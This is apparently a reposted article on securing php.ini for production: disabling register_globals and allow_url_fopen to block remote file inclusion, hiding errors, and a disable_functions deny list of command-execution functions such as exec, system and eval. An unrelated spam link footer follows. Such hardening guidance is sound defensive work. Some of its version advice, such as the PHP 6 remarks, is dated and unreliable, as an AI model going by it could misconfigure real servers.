Securing php configuration for production mode
Securing php configuration for production mode
The Apache-PHP-MYSQL combination is becoming immensely popular these days for web application development due to their versatile and powerful nature. On top of that these components are all open source but unfortunately both Apache and PHP comes with a default configuration which, if considered from security prospective, is not ideal for production environment and consequently may cause developers to use insecure techniques during the development phase. In this article I will discuss some of the insecure configuration settings of php.ini file which is the default confutation file for PHP.
register_globals:
When the register_globals parameter is turned on, all the EGPCS (Environment, GET, POST, Cookie and Server) variables are automatically registered as global variables and may allow attackers to freely manipulate global variables in many situations. Fortunately it's disabled by default from PHP 4.2.0 and on. Do not enable it no matter what. For example you probably have seen urls that look like this http://www.example.com/somepage.php?someparam=somevalue. When register_globals variable is on, the variable called someparam is passed into your script with its value set to somevalue. When register_globals variable is off, variables passed in like this are not automatically dumped into your scripts variable list. This makes it harder for someone to inject his own code.
Recommended secure setting: register_globals = off
open_basedir:
You can restrict what PHP can read or write by properly setting the open_basedir option. When the open_basedir parameter is enabled, PHP will be able to access only those files, which are placed in the specified directories (and subdirectories) /var/www/htdocs/files for instance. In this case, you can limit what fopen and other file access functions can read and write to by using the following secure setting:
Recommended secure setting: open_basedir = /var/www/htdocs/files
expose_php:
PHP reveals its version in several ways: It may send an HTTP header (X-Powered-By: PHP) or append its name and version to Apache's signature. Obviously there is no reason to let end users know the exact PHP version. Luckily there is PHP setting expose_php in php.ini file which, if set to off, will disable all the above possibilities.Recommended secure setting: expose_php = offallow_url_fopen:File handling functions like fopen, file_get_contents, and include accept URLs as file parameters (for example: fopen ('http://www.example.com/', 'r')) or include("'http://example.com/page").If allow_url_fopen is set to off only files that reside within your website can be included.You won't be able to include a file from a different server, but neither will anybody else. When someone else does it maliciously by embedding the URL in an otherwise innocent-looking HTTP request and hoping that your script can be tricked into including and running their script, it's called a Remote File Inclusion (RFI) attack. Having allow_url_fopen = Off dooms all such attacks to fail.Some webmasters think they need to have allow_url_fopen = On because their pages are already coded to use URLs to include files from their own site or from some external site. It is worth expending some effort to try to stop doing that so that you can turn allow_url_fopen off:You can include a file from your own site simply by specifying its path and filename. Here is an example how to convert a URL include to one that does not use a URL:Include ($_SERVER ['DOCUMENT_ROOT'] . '/page.php');$_SERVER['DOCUMENT_ROOT'] is a superglobal variable calculated by the server to be the root folder of your site, the equivalent of "/", which is usually public_html. Note that it does not provide a trailing "/", so you must provide a leading "/" in '/page.php'. Now you have a reliable method to refer to any file without having to use relative paths and without using a URL unnecessarily.If you include static content (that doesn't change) from another of your websites, such asinclude ('http://myothersite.com/includes/footer.php'), you can make a copy of that content in the current site and then include it locally as described above. Having duplicate copies of a few files is a small price to pay for the better security of having allow_url_fopen Off.If you cannot avoid it and must include content from a remote site using URLs, you'll need to set allow_url_fopen = On. You can still get some protection from RFI attacks by using an alternative method that relies on .htaccess to ban incoming requests that contain potentially malicious URLs. See Section 1b) below and follow the link there.Recommended secure setting: allow_url_fopen = Offdisplay_errors:By default, PHP prints error messages to the browser's output. While this is desirable during the development process, it may reveal security information to users, like installation paths or usernames. It's highly recommended to disable this on a production server, and send error messages to a log file instead.Recommended secure setting: display_errors = Off log_errors & error_log:error_log parameter specifies the name of the file, which will be used to store information about warnings and errors (this log file must be writeable by the user or group apache).When log_errors is turned on, all the warnings and errors are logged into the file that is specified by the error_log parameter. If this file is not accessible, information about warnings and errors are logged by the Apache server.Recommended secure setting: log_errors = On, error_log =magic_quotes_gpc:The PHP manual recommends setting this parameter to off and deal with quotes in a more secure manner on your own.safe_mode:If this parameter is set to "on", access to files not owned by Apache is disabled, and access to environment variables and execution of binary programs are also disabled. However, some very popular third party scripts, which you might want to use eventually, will not run properly when it is set to On. In addition, if your webhost uses suPHP, safe_mode serves no purpose. Lastly, beginning with PHP 6, safe_mode doesn't even exist. Therefore, it is best left out of your php.ini file, or, if present, set to Off.Recommended setting: safe_mode = off safe_mode_gid: With safe_mode_gid enabled instead of safe_mode, PHP will be able to open files that belong to Apache's group regardless of the owner. Recommended setting: safe_mode_gid = Onsafe_mode_exec_dir & safe_mode_allowed_env_vars: Safe mode is also useful in stopping PHP from executing binaries, but sometimes you may need to let it run specific programs. In this case place these binaries (or symbolic links to them) in a directory (/var/www/binaries for instance) and use the following option: Recommended setting: safe_mode_exec_dir = /var/www/binaries Finally, to allow access to certain environment variables, use the following setting, providing a comma-separated list of prefixes. Only environment variables which names begin with one of the prefixes will be accessible: Recommended setting: safe_mode_allowed_env_vars = PHP_ disable_functions: PHP has a lot of potential to mess up your server and hack user accounts and even get root. I've seen many times where users use an insecure PHP script as an entry point to a server to start unleashing dangerous commands and taking control. By setting this disable_functions parameter to some specific functions, it is possible to deny execution of those functions by any scripts in your site. Here is an example of its use, with a list of some of the functions that could be disabled for increased security: Disable_functions= exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl,(comma-separated list of function names) This tells PHP not to allow the listed functions to be executed by any script in your site. The functions listed above are especially powerful, and many malicious scripts use them. By blocking their use, you block the scripts from causing much of their damage even if they do somehow manage to get into your site and run. Note:To deny all web access to your php.ini file add the following section if it is not there in your .htaccess file:order allow, denydeny from allhttp://www.articlesbase.com/security-articles/securing-php-configuration-for-production-mode-3836050.html
Tmj No More Program Download-Most effective and natural treatment which aims to root out The temporomandibular joint (TMJ) completely UPS Power Solutions for Mission Critical networks Double Edged Fat Loss Download-It connects neuron strength and fat loss 1000 Calorie Challenge Download-If you want to manage your overweight as soon as possible Someone Wake Me Up Ringtone | Download Joe McElderry Someone Wake Me Up Ringtone Pyro Ringtone | Download Kings Of Leon Pyro Ringtone Internet Marketing Strategies HP plans big for Networking Payday Loans Over the internet No Credit Check for the trouble-free Loan Application Error 1723 in Java Software Articles About Network Marketing - How To Increase Your Prospects List with Articles Download Self defense Dvds Join the adult video chat at eChatNetwork!